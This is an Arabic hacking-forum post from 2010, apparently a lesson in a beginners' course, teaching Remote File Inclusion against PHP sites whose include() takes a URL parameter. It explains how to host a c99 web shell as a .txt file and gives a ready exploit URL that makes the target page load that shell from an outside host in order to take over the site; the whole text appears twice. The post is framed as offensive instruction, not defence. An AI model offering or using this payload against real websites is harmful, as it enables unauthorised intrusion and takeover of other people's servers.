ViRuS_Ra3cH
18/03/2010, 01:30
http://www.fleur.net/newdesign/me/blogpics/absolut_hacker.jpg
السلام عليكم ورحمة الله وبركاته
وصلنا والحمدلله لدرس الثالث في الدورة وهي ((دينامكية عمل Remote File include))
كما قلت في الدرس الثاني انه هذه الثغرة شبه منقرضه فقررت ان أشرحها كمعلومة عامة للجداد في الهكر
الثغرة اساسها خطأ في دالة include() في لغة الـPHP واللي يعرف للغة بيفهم قصدي
هذه الدالة شغلتها انه تقترن ملف من الملفات مثلا
www.site.com/index.php?id=main.html
هنا المبرمج يطلب من المتغير id الذي يحتويه ملف index.php بأن يقترن محتوى ملف main.html
ففكر بعض الهكر في طريقة لإقتران محتوى الشل الخاص بهم ليستولوا على الموقع
والطريقة هي ان ترفع شل على استضافة مجانية او مدفوعه بشرط ان يكون امتداد الملف txt
مثلا هذا الشل
http://www.c99.mobi/c99.txt
نريد ان نجعل index.php يقترنه عن طريق نفس المتغير id
وطريقة كتابة الإستغلال هي
www.site.com/index.php?id=http://www.c99.mobi/c99.txt?
ع وضع علامة الـ ؟ في نهاية رابط الشل
واذا الثغرة شغاله >>> وانا لأتوقع هذا الشيء
فسوف ترى الشل امامك واذا لم تشتغل الثغرة سترى خطأ او سيحولك الموقع الى صفحة اخرى
الى هن ننهي الشرح
السلام عليكم ورحمة الله وبركاته
وصلنا والحمدلله لدرس الثالث في الدورة وهي ((دينامكية عمل Remote File include))
كما قلت في الدرس الثاني انه هذه الثغرة شبه منقرضه فقررت ان أشرحها كمعلومة عامة للجداد في الهكر
الثغرة اساسها خطأ في دالة include() في لغة الـPHP واللي يعرف للغة بيفهم قصدي
هذه الدالة شغلتها انه تقترن ملف من الملفات مثلا
www.site.com/index.php?id=main.html
هنا المبرمج يطلب من المتغير id الذي يحتويه ملف index.php بأن يقترن محتوى ملف main.html
ففكر بعض الهكر في طريقة لإقتران محتوى الشل الخاص بهم ليستولوا على الموقع
والطريقة هي ان ترفع شل على استضافة مجانية او مدفوعه بشرط ان يكون امتداد الملف txt
مثلا هذا الشل
http://www.c99.mobi/c99.txt
نريد ان نجعل index.php يقترنه عن طريق نفس المتغير id
وطريقة كتابة الإستغلال هي
www.site.com/index.php?id=http://www.c99.mobi/c99.txt?
ع وضع علامة الـ ؟ في نهاية رابط الشل
واذا الثغرة شغاله >>> وانا لأتوقع هذا الشيء
فسوف ترى الشل امامك واذا لم تشتغل الثغرة سترى خطأ او سيحولك الموقع الى صفحة اخرى
الى هن ننهي الشرح